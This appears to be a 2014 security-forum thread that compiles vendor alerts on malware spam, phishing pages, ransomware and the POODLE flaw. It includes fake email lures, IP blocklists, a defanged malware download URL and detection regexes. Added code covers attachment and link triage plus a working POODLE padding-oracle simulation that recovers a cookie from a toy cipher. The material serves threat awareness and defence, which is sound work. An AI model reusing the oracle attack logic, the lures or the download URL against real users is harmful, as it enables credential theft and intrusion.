> https://blog.malwarebytes.org/wp-content/uploads/2014/10/sysoppro-autoexec.png?w=555
- Affected machine slows down
- Shortcut files are created on the desktop
During testing, we haven’t seen any installation of the Ebola Early Warning System toolbar or evidence of warning alerts. We implore users not to be easily swayed with software solutions banking on the Ebola scare. They may be more about enticing internet users into downloading programs that may potentially do harm on their systems, instead of helping them be aware of the current situation**..."
* https://www.virustotal.com/en/file/4c7647ff605a9880f875010b5a09e7f1435b002ad4635dff6c4d14f218eb7dd7/analysis/1414142257/
** http://www.cdc.gov/vhf/ebola/
:mad: :fear:
AplusWebMaster
2014-10-29, 14:24
FYI...
Fake 'Order confirmation' from Amazon SPAM - trojan
- http://blog.mxlab.eu/2014/10/28/fake-order-confirmation-order-details-from-amazon-contains-trojan/
Oct 28, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Order Details”. This email is sent from the spoofed address “Amazon .co.uk ” and has the following body:
Good evening,
Thank you for your order. We'll let you know once your item(s) have dispatched. You can view the status of your order or make changes to it by visiting Your Orders on Amazon .co.uk.
Order Details
Order R:131216 Placed on October 09, 2014
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon...
The 532 kB malicious file is not present in a ZIP file but attached directly and has the name order_report_72364872364872364872364872368.exe (numbers may vary). The trojan is known as Trojan.MSIL.BVXGen, BehavesLike.Win32.Dropper.qh or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/17de4b7fab716f6c87b5d3c941ecb5f5b01d5e4980cff71c88451acc90b22bb0/analysis/1414490630/
- http://myonlinesecurity.co.uk/amazon-com-alert-order-details-malware/
29 Oct 2014
- https://www.virustotal.com/en/file/6fb9d2d2de05751a90e70a2973a51a1cf38939075c6849b650b5f00b07183532/analysis/1414584579/
___
Phish - spoofed Google Drive
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-improve-scheme-with-spoofed-google-drive-site/
Oct 29, 2014 - "Cybercriminals and attackers are leveraging the Google Drive site and brand to go under the radar and avoid detection. Just last week, a targeted attack* used Google Drive as a means of getting information from its victims. This time, phishers are using a modified version of the legitimate Google Drive login page to steal email credentials. This attack can be considered an improved version of attacks seen earlier this year, which asked for multiple email addresses**.
Fake Google Drive Site: Users may receive an email that contains links that lead to the spoofed Google Drive site.
Spammed message containing links to fake site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive1.jpg
The phishing site allows users to log in using different email services, which is highly unusual as Google Drive only uses Google credentials. The site also has a language option that does not work.
Fake Google Drive site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive2.jpg
To trick the user into thinking nothing suspicious is afoot, the phishing site -redirects- the user to a .PDF file from a -legitimate- site about investments. However, this redirection to a site about investments may still raise suspicions as nothing in the email indicates the specific content of the “document” is related to finances.
After logging in, users are redirected to a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive3.jpg
... Mobile Users, Also Affected: Based on our investigation, this attack will also work on mobile devices. When users clicked the “Sign in” button, the PDF file download is prompted and the users’ credentials are sent out to the cybercriminals.
Screenshot of PDF prompt download in mobile devices:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/google_drive_fig8.jpg
... Users should exercise caution when opening emails, even those from known contacts. Avoid clicking links that are embedded in emails. Users can also check first by hovering their mouse over the link; doing so can reveal the true URL of the link in the status bar. Users can also check the legitimacy of the site before sharing any personal data, be it login credentials or contact details. They can check if the site address has any discrepancy (misspellings, different domain names) from the original site (e.g., <sitename .com> versus <sitename .org>). They should also check the security of the site before sharing any information... We have notified Google about this phishing page."
* http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/
** http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
___
Fake ticketmaster SPAM – PDF malware
- http://myonlinesecurity.co.uk/ticketmaster-tickets-sent-fake-pdf-malware/
29 Oct 2014 - "'ticketmaster tickets have been sent' pretending to come from confirmation-noreply@ ticketmaster .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for choosing Ticketmaster.
This email is to confirm ticket(s) have been purchased and attached:
Your Delivery Option is: printed
Your Transaction number is: 869064,00410 ...
29 October 2014: tikets224069_order_type_print_order_details.pdf.zip:
Extracts to: tikets109873_order_type_print_order_details.pdf.exe
Current Virus total detections: 7/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/203daa7fed582e06c8fd7bb770e1f8104c625261e0a03e44ab8ab7296bd4ffac/analysis/1414593309/
___
'Virtual Assistant' - PUP download site
- https://blog.malwarebytes.org/online-security/2014/10/pup-download-site-makes-use-of-virtual-assistant/
Oct 29, 2014 - "... suddenly there’s a person talking at you from the bottom right hand corner of the screen about how you should buy product X or make use of service Y? We recently saw a page asking visitors to upgrade their media player, which Malwarebytes Anti-Malware detects as PUP.Optional.SaferInstall (VirusTotal 12/53*). It looks a lot like many similar download sites out there [1], [2], with one curious addition standing over on the right hand side:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual1.jpg
A virtual assistant! She isn’t very interactive, instead launching into a recorded voiceover after a minute or so of the visitor doing nothing on the webpage. She says:
Please upgrade your media player for faster hd playback.
It only takes a minute on broadband and theres no restart required
Just click this button and follow the easy steps onscreen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual2.jpg
... I haven’t seen a virtual assistant / automated online assistant / video spokesperson / video web presenter / whatever they’re called this week used to promote a PUP (Potentially Unwanted Program) download before... Who knows what.. advertising will offer up next..."
* https://www.virustotal.com/en/file/cf192f2c0c433b10ef963f199ae759264749c72a100d4b5907d555ec748cf519/analysis/1414085568/
... Behavioural information
TCP connections
66.77.96.162: https://www.virustotal.com/en/ip-address/66.77.96.162/information/
87.248.208.11: https://www.virustotal.com/en/ip-address/87.248.208.11/information/
90.84.55.33: https://www.virustotal.com/en/ip-address/90.84.55.33/information/
63.245.201.112: https://www.virustotal.com/en/ip-address/63.245.201.112/information/
[1] http://blog.malwarebytes.org/wp-content/uploads/2014/01/asosvouchers5.jpg
[2] http://blog.malwarebytes.org/wp-content/uploads/2013/12/obamapads4.jpg
___
Hacks use Gmail Drafts to update their Malware and Steal Data
- http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
10.29.14 - "... Researchers at the security startup Shape Security say they’ve found a strain of malware on a client’s network that uses that new, furtive form of “command and control” — the communications channel that connects hackers to their malicious software — allowing them to send the programs updates and instructions and retrieve stolen data. Because the commands are hidden in unassuming Gmail drafts that are never even sent, the hidden communications channel is particularly difficult to detect. “What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” says Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer — IE allows itself to be run by Windows programs so that they can seamlessly query web pages for information, so the user has no idea a web page is even open on the computer. With the Gmail drafts folder open and hidden, the malware is programmed to use a Python script to retrieve commands and code that the hacker enters into that draft field. The malware responds with its own acknowledgments in Gmail draft form, along with the target data it’s programmed to exfiltrate from the victim’s network. All the communication is encoded to prevent it being spotted by intrusion detection or data-leak prevention. The use of a reputable web service instead of the usual IRC or HTTP protocols that hackers typically use to command their malware also helps keep the hack hidden. 
Williamson says the new infection is in fact a variant of a remote access trojan (RAT) called Icoscript first found by the German security firm G-Data* in August. At the time, G-Data said that Icoscript had been infecting machines since 2012, and that its use of Yahoo Mail emails to obscure its command and control had helped to keep it from being discovered. The switch to Gmail drafts, says Williamson, could make the malware stealthier still..."
* https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript
___
Dangers of opening suspicious emails: Crowti ransomware
- http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
28 Oct 2014 - "... MMPC has seen a spike in the number of detections for threats in the Win32/Crowti ransomware family this month as the result of new malware campaigns. Crowti is a family of ransomware that when encountered will attempt to encrypt the files on your PC, and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits. Crowti impacts -both- enterprise and home users, however, this type of threat can be particularly damaging in enterprise environments. In most cases, ransomware such as Crowti can encrypt files and leave them inaccessible. That’s why it’s important to back up files on a regular basis... We also recommend you increase awareness about the dangers of opening suspicious emails – this includes not opening email attachments or links from untrusted sources. Attackers will usually try to imitate regular business transaction emails such as fax, voice mails, or receipts. If you receive an email that you’re not expecting, it’s best to ignore it. Try to validate the source of the email first -before- clicking on a link or opening the attachment... The graph below shows how Crowti ransomware has impacted our customers during the past month.
Daily encounter data for Win32/Crowti ransomware:
> http://www.microsoft.com/security/portal/blog-images/a/crowti1.png
Computers in the United States have been most affected with 71 percent of total infections, followed by Canada, France and Australia.
Telemetry data for Win32/Crowti by country, 21 September – 21 October 2014:
> http://www.microsoft.com/security/portal/blog-images/a/crowti2.png
Crowti is being distributed via spam campaigns with email attachments designed to entice the receiver to open them. We have seen the following attachment names:
VOICE<random numbers>.scr
IncomingFax<random numbers>.exe
fax<random numbers>.scr/exe
fax-id<random numbers>.exe/scr
info_<random numbers>.pdf.exe
document-<random numbers>.scr/exe
Complaint_IRS_id-<random numbers>.scr/exe
Invoice<random numbers>.scr/exe
The attachment is usually contained within a zip archive. Opening and running this file will launch the malware... Our telemetry and research shows that Win32/Crowti is also distributed via exploit kits such as Nuclear, RIG, and RedKit V2. These kits can deliver different exploits, including those that exploit Java and Flash vulnerabilities... Crowti's primary payload is to encrypt the files on your PC. It usually brands itself with the name CryptoDefense or CryptoWall... we saw a Crowti sample distributed with a valid digital certificate which was issued to Trend... This is not associated with Trend Micro and the certificate has since been revoked. Crowti has used digital certificates to bypass detection systems before - we have previously seen it using a certificate issued to The Nielsen Company... There are a number of security precautions that can help prevent these attacks in both enterprise and consumer machines. As well as being aware of suspicious emails and backing up your files, you should also keep your security products and other applications up-to-date. Attackers are taking advantage of unpatched vulnerabilities in software to compromise your machine. Most of the exploits used by Crowti target vulnerabilities found in browser plugin applications such as Java and Flash. Making a -habit- of regularly updating your software can help reduce the risk of infection... we also recommend running a real-time security product..."
:fear::fear: :mad:
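Several of the posts above turn on the same trick: a ".pdf.exe" or "_pdf.exe" name that reads as a document once Windows hides known extensions, and the Crowti attachment names quoted from the MMPC post (VOICE<numbers>.scr, IncomingFax<numbers>.exe, info_<numbers>.pdf.exe and so on). The mail-gateway triage below is an added example written for this thread, not code from any of the quoted blogs or vendors; the extension lists are constructed for the example, and the only campaign-specific patterns are the Crowti names from the post, with <random numbers> taken as one or more digits.

```python
import re
from typing import Dict, List

# Extensions Windows runs as programs. Constructed list for this example;
# extend it for your own environment.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf", "jar"}
ARCHIVE_EXTS = {"zip", "rar", "7z"}
# Extensions a recipient expects to open harmlessly in a viewer.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "jpeg", "png", "htm", "html"}

# Attachment-name patterns quoted in the Crowti post (<random numbers> -> \d+).
CROWTI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"^VOICE\d+\.scr$",
    r"^IncomingFax\d+\.exe$",
    r"^fax\d+\.(scr|exe)$",
    r"^fax-id\d+\.(exe|scr)$",
    r"^info_\d+\.pdf\.exe$",
    r"^document-\d+\.(scr|exe)$",
    r"^Complaint_IRS_id-\d+\.(scr|exe)$",
    r"^Invoice\d+\.(scr|exe)$",
)]


def triage_attachment(name: str) -> List[str]:
    """Return the reasons an attachment file name looks suspicious (empty list if none)."""
    reasons: List[str] = []
    lower = name.strip().lower()
    if "." not in lower:
        return reasons
    base, ext = lower.rsplit(".", 1)

    if ext in EXEC_EXTS:
        reasons.append(f"executable extension .{ext}")

    if ext in EXEC_EXTS or ext in ARCHIVE_EXTS:
        # "job.pdf.exe" or "tickets.pdf.zip": a document extension sits right
        # before the real one, which is all the user sees once Windows hides
        # extensions for known file types.
        m = re.search(r"\.([a-z0-9]+)$", base)
        if m and m.group(1) in DOC_EXTS:
            reasons.append(f"double extension .{m.group(1)}.{ext}")
        # "e-Ticket_klm_Itinerary_pdf.exe": the dot is replaced by _ or - so the
        # name still reads like a document once .exe is hidden.
        m = re.search(r"[_-]([a-z0-9]+)$", base)
        if m and m.group(1) in DOC_EXTS:
            reasons.append(f"document look-alike suffix {m.group(0)} before .{ext}")

    if any(p.match(name.strip()) for p in CROWTI_PATTERNS):
        reasons.append("matches Crowti attachment naming")
    return reasons


def triage_archive(archive_name: str, members: List[str]) -> Dict[str, List[str]]:
    """Triage an archive by its own name plus each member name (the member list
    is what you would read from the zip's central directory before extracting)."""
    result = {archive_name: triage_attachment(archive_name)}
    for member in members:
        result[member] = triage_attachment(member)
    return result


if __name__ == "__main__":
    # Constructed sample names modelled on the posts above.
    for sample in ("invoice_0544422.doc", "job.pdf.exe", "e-Ticket_klm_Itinerary_pdf.exe",
                   "fax1234.scr", "info_4521.pdf.exe", "statement.docx"):
        print(f"{sample:35} {triage_attachment(sample) or 'ok'}")
```

The look-alike check is what catches the KLM sample, whose name uses "_pdf.exe" rather than ".pdf.exe"; a rule that only looks for a dotted double extension misses it. Rather than blocking outright on the name alone, a gateway would normally use these reasons to quarantine or to raise the score fed to a sandbox.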
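The Trend Micro advice in the Google Drive item above (hover to see the true URL, compare the target against the real site's domain) can be automated on the gateway side for HTML mail. The checker below is an added example for this thread, not Trend Micro's or Google's code; the sample message is constructed, the brand domain set is an assumption supplied by the caller, and registered_domain() uses a last-two-labels shortcut rather than a public-suffix list.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample modelled on the fake "shared with you" mails in this thread.
SAMPLE_MAIL = """
<p>Grady Murphy shared a file with you.</p>
<a href="http://drive.google.com.example-share.net/open?id=1">https://drive.google.com/open?id=1</a>
<a href="https://accounts.google.com/signin">Sign in</a>
<a href="http://198.51.100.7/gdrive/login.html">Confirm request</a>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML mail body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host: str) -> str:
    """Last two labels of a host name; IP literals are returned unchanged.
    Assumption of this example: a public-suffix list would be more accurate."""
    host = host.lower().rstrip(".")
    if IPV4.match(host):
        return host
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def check_links(body: str, expected_domains: Set[str]) -> List[Dict[str, object]]:
    """Flag anchors whose real target disagrees with what the reader is shown,
    or that leave the domains the claimed sender actually uses."""
    parser = _AnchorCollector()
    parser.feed(body)
    findings: List[Dict[str, object]] = []
    for href, text in parser.links:
        host = (urlsplit(href).hostname or "").lower()
        target = registered_domain(host)
        reasons: List[str] = []
        # Visible text that looks like a URL but names a different site than the href.
        m = re.search(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", text, re.I)
        if m and registered_domain(m.group(1)) != target:
            reasons.append(f"link text shows {m.group(1)} but target is {host}")
        if IPV4.match(host):
            reasons.append(f"target is a raw IP address {host}")
        for brand in expected_domains:
            # "drive.google.com.example-share.net": the brand is only a prefix of the host.
            if f".{brand}." in f".{host}." and target != brand:
                reasons.append(f"brand domain {brand} embedded in unrelated host {host}")
        if host and target not in expected_domains:
            reasons.append(f"target {host} is outside the expected domains")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in check_links(SAMPLE_MAIL, {"google.com"}):
        print(finding["href"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The "brand embedded in host" rule is the programmatic form of the <sitename .com> versus <sitename .org> comparison in the post: the user sees a familiar name at the left of the host, but the part that decides where the browser goes is at the right.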
AplusWebMaster
2014-10-30, 12:05
FYI...
Fake Securitas SPAM – PDF malware
- http://myonlinesecurity.co.uk/securitas-mail-report-attached-fake-pdf-malware/
30 Oct 2014 - "'From Securitas Mail Out Report Attached' pretending to come from Alert ARC Reports is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk.com
30 October 2014: Q100982010_Mail Out Report.zip: Extracts to: Q100771292_Mail Out Report.exe
Current Virus total detections: 1/54* . This 'From Securitas Mail Out Report Attached' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/835a6a272b252576247a6f51bd1fc6e4ac972284435759baa8fd4f926c25bd97/analysis/1414659759/
___
Fake 'Accounts Payable' SPAM - malware .doc attachment
- http://myonlinesecurity.co.uk/reminder-word-doc-malware/
30 Oct 2014 - "An email with a Microsoft word doc attachment saying 'Please see attached statement sent to us' pretending to come from random names with a subject of 'Further Reminder' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The name of the alleged sender matches the name of the 'Senior Accounts Payable Clerk from the Finance Department' in the body of the email... word macro malware*... The email looks like:
Good afternoon,
Please see attached statement sent to us, I have highlighted on this the payments made to you in full and attached a breakdown of each one for you to correctly allocate. Hope this helps.
Thanking you in advance.
Many Thanks & Kind Regards
Vivian Dennis
Senior Accounts Payable Clerk
Finance Department ..
30 October 2014 : CopyHA779333.doc - Current Virus total detections: 0/53**. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
** https://www.virustotal.com/en/file/949d05c3e51abcee43c74c5309a61b18ffa1cf17cb0be06bdab1a4e52cadb8f5/analysis/1414671500/
- http://blog.dynamoo.com/2014/10/further-reminder-spam-has-malicious.html
30 Oct 2014
... Recommended blocklist:
212.59.117.207: https://www.virustotal.com/en/ip-address/212.59.117.207/information/
217.160.228.222: https://www.virustotal.com/en/ip-address/217.160.228.222/information/
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
81.7.3.101: https://www.virustotal.com/en/ip-address/81.7.3.101/information/
195.154.126.245: https://www.virustotal.com/en/ip-address/195.154.126.245/information/
___
Fake Job offer SPAM - malware
- http://myonlinesecurity.co.uk/job-service-new-offer-job-malware/
30 Oct 2014 - "'Job service New offer Job' pretending to come from Job service is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/new-offer-job.png
30 October 2014: job.pdf.zip: Extracts to: job.pdf.exe
Current Virus total detections: 3/53*. same malware as today’s version of my new photo malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2723a595350cb632eac5f98a794265105e49e1be181a50437184482b32075b94/analysis/1414662840/
** http://myonlinesecurity.co.uk/new-photo-malware/
___
Malicious Browser Extensions
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-look-into-malicious-browser-extensions/
Oct 29, 2014 - "Malicious browser extensions bring about security risks as these often lead to system infection and unwanted spamming on Facebook. Based on our data, these attacks have notably affected users in Brazil. We have previously reported that cybercriminals are putting malicious browsers in the official Chrome Web store. We also came across malware that -bypasses- a Google security feature that checks third-party extensions... we performed an in-depth analysis of a malicious Chrome browser extension and its evasion tactics, after receiving samples from Facebook. Facebook’s Security team conducts their own malware research and they regularly collaborate with Trend Micro to keep their service safe... Based on our data starting from May 2014 onwards, Trend Micro HouseCall has helped about 1,000,000 users whose computers have been infected by malicious browser extensions. The top affected countries are mostly located in the Latin American region, such as Brazil, Mexico, Colombia, and Peru.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/FB-extension-infection.jpg
... We strongly advise users to avoid clicking links from messages, even if they appear to come from your friends. Users can also opt to use Trend Micro HouseCall* to secure their systems from online threats, including those that may leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat. Below is the SHA1 hash of the malicious file:
4733c4ea00137497daad6d2eca7aea0aaa990b46 "
* http://housecall.trendmicro.com/
___
Popular Science site compromised
- http://community.websense.com/blogs/securitylabs/archive/2014/10/28/official-website-of-popular-science-is-compromised.aspx
28 Oct 2014 - "... injected with a malicious code that -redirects- users to websites serving exploit code, which subsequently drops malicious files on each victim's computer... injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit..."
:mad: :fear:
AplusWebMaster
2014-10-31, 14:25
FYI...
Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
31 Oct 2014 - "This -fake- Amazon email comes with a malicious Word document attached:
From: Amazon.co.uk [auto-shipping@ amazon .co.uk]
Reply-To: "auto-shipping@ amazon .co.uk" [auto-shipping@ amazon .co.uk]
Date: 31 October 2014 09:12
Subject: Your Amazon.co.uk order has dispatched (#203-2083868-0173124)
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit ...
Your order #203-2083868-0173124 (received October 30, 2014) ...
The Word document contains a malicious macro... but is currently undetected at VirusTotal* (the Malwr report doesn't say much...). The macro then downloads http ://ctmail .me/1.exe and executes it. This malicious binary has a detection rate of 4/52**... 84.40.9.34 is Hostway in Belgium, 213.143.97.18 is Wien Energie, Austria. The malware also downloads a DLL as 2.tmp which has a detection rate of 3/54***.
Recommended blocklist:
213.143.97.18
84.40.9.34
ctmail .me "
* https://www.virustotal.com/en/file/30990e856868cf63c8b680aa333d687f38a1efe03c11aea1a290f30c5d6668ac/analysis/1414752406/
** https://www.virustotal.com/en/file/8c79bff0c302a0c1762fc59ab7001001a9293506197579213e087868493b756e/analysis/1414752639/
*** https://www.virustotal.com/en/file/7534ac5bbb9ff975a744c39320e7d372e80007a1896a04533a8a4b92633bf369/analysis/1414754766/
- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
* https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/1414744958/
___
Fake 'Confirmation' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/
31 Oct 2014 - "An email saying 'Please find attached Remittance and BACS confirmation for September and October Invoices' pretending to come from random names, companies and email addresses with a subject of 'Remittance Confirmation [random characters]' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good morning,
Please find attached Remittance and BACS confirmation for September and October Invoices
Best Wishes
Lynn Blevins
Accounts Dept Assistant
Site Management Services (Central) Ltd ...
31 October 2014 : CU293705.doc - Current Virus total detections: 0/52*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5b38d77c33938254fa50ced98a7471dbe4b8ec2aceb1ae2863bb14c812f0f226/analysis/1414747524/
___
Chrome 40 to terminate use of SSL ...
- http://www.theregister.co.uk/2014/10/31/google_puts_down_poodle/
31 Oct 2014 - "... Update 40* will remove SSLv3 and the hard-to-exploit cookie-stealing Padding Oracle on Downgraded Legacy Encryption (POODLE) attack. Cupertino followed -Redmond- in its browser POODLE put-down after a single click FixIt SSLv3 disabler was issued for Internet Explorer** ahead of removal in a few months. Google security engineer Adam Langley wrote in an update that some buggy servers may stop working as a result... -Chrome- 39 will show a yellow flag over the SSL lock icon, the protocol design flaw that allowed hackers to hijack victims' online accounts and which prompted tech companies to dump SSLv3 in upcoming releases such as -Mozilla's- Firefox 34***..."
* https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4
** https://support.microsoft.com/kb/3009008#FixItForMe
*** https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/
:mad: :fear:
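Why browsers are removing SSLv3 outright rather than just warning about it, as an added illustration that is not code from The Register, Google or Mozilla: SSL 3.0 checks only the last byte (the pad length) of a CBC record's padding, so a receiver that accepts a record whose padding block has been swapped for another ciphertext block leaks one plaintext byte about every 256 tries. The simulation below stands in for the real protocol with several labelled assumptions: a toy 16-byte Feistel cipher built from HMAC-SHA256 replaces the real block cipher, each record gets a random IV (SSL 3.0 actually chains IVs), and the "browser" re-sends the same request with attacker-chosen path and body lengths, which is what the POODLE JavaScript does.

```python
# Added example, not part of the original post: POODLE against an SSL 3.0-style
# CBC record layer. Everything here is a simulation with a toy cipher.
import hashlib
import hmac
import random

BLOCK = 16
rng = random.Random(2014)                 # seeded so the demo is reproducible

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, r, half):
    # Round function of the toy Feistel cipher (assumption: NOT a real cipher)
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    L, R = blk[:8], blk[8:]
    for r in range(4):
        L, R = R, xor(L, _round(key, r, R))
    return L + R

def block_decrypt(key, blk):
    L, R = blk[:8], blk[8:]
    for r in reversed(range(4)):
        L, R = xor(R, _round(key, r, L)), L
    return L + R

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(xor(block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)

def mac(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()[:16]

ENC_KEY, MAC_KEY = b"demo-enc-key", b"demo-mac-key"
SECRET = b"Cookie: sid=7f3a"              # constructed; what the attacker wants

def ssl3_seal(data):
    """SSL 3.0 record body: data || MAC || padding || padlen.
    Only padlen is meaningful; the padding bytes are never checked."""
    body = data + mac(MAC_KEY, data)
    padlen = (BLOCK - 1) - len(body) % BLOCK
    body += bytes(rng.randrange(256) for _ in range(padlen)) + bytes([padlen])
    iv = bytes(rng.randrange(256) for _ in range(BLOCK))   # random IV (simplification)
    return iv, cbc_encrypt(ENC_KEY, iv, body)

def ssl3_open(iv, ct):
    """Server side: True if the record is accepted. Accept/reject is the oracle."""
    pt = cbc_decrypt(ENC_KEY, iv, ct)
    padlen = pt[-1]
    if padlen > BLOCK - 1:
        return False
    body = pt[:len(pt) - padlen - 1]
    data, tag = body[:-16], body[-16:]
    return hmac.compare_digest(tag, mac(MAC_KEY, data))

def browser_request(prefix_len, suffix_len):
    """Victim browser: attacker JS picks the URL path length (prefix) and the
    POST body length (suffix); the secret cookie rides along unchanged."""
    return ssl3_seal(b"/" * prefix_len + SECRET + b"x" * suffix_len)

def poodle_recover(secret_len, max_tries=100_000):
    recovered = bytearray()
    for k in range(secret_len):
        p = (BLOCK - 1 - k) % BLOCK          # secret[k] lands as last byte of block i
        s = -(p + secret_len) % BLOCK        # data+MAC aligned => padding is a full block
        i = (p + k + 1) // BLOCK - 1
        for _ in range(max_tries):
            iv, ct = browser_request(p, s)
            blocks = [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
            prev = iv if i == 0 else blocks[i - 1]
            forged = b"".join(blocks[:-1]) + blocks[i]   # C_i replaces the padding block
            if ssl3_open(iv, forged):
                # accepted => D(C_i)[15] ^ C_{n-2}[15] == 15, and P_i = D(C_i) ^ prev
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ prev[-1])
                break
        else:
            raise RuntimeError("oracle never accepted; block alignment is wrong")
    return bytes(recovered)

if __name__ == "__main__":
    print(poodle_recover(len(SECRET)))
```

The fix in TLS 1.0 and later is that every padding byte must equal the pad length, so a swapped-in block is rejected with probability close to 1 and the oracle disappears; that is why disabling SSLv3 (or enforcing TLS_FALLBACK_SCSV so a downgrade to it cannot be forced) closes the hole, while a yellow warning icon does not.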
AplusWebMaster
2014-11-03, 15:52
FYI...
Fake invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/new-invoice-random-characters-created-word-doc-malware/
